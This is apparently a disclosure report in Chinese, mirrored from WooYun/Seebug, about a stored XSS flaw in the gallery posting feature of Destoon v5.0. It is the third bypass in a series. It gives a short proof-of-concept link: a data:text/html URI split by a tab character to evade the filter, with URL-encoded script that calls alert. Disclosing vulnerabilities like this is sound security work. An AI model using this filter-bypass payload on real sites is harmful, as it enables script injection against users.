### 简要描述:
destoon /v5.0/ 存储型xss 指哪打哪(绕过3)
### 详细说明:
关联url: [WooYun: destoon /v5.0/ 存储型xss 指哪打哪(绕过2)](http://www.wooyun.org/bugs/wooyun-2014-062052)
在发表图库时 未对发送的代码做出过滤
[<img src="https://images.seebug.org/upload/201406/110947477e6758bb4df67b5dd8859aa829e34015.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/110947477e6758bb4df67b5dd8859aa829e34015.jpg)
poc
```
<a href=d
	ata:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>M
```
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201406/1109482775e1b2896a787b7c6b79c8b4f4257b96.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/1109482775e1b2896a787b7c6b79c8b4f4257b96.jpg)
点击就弹了,
京公网安备 11010502034610号
暂无评论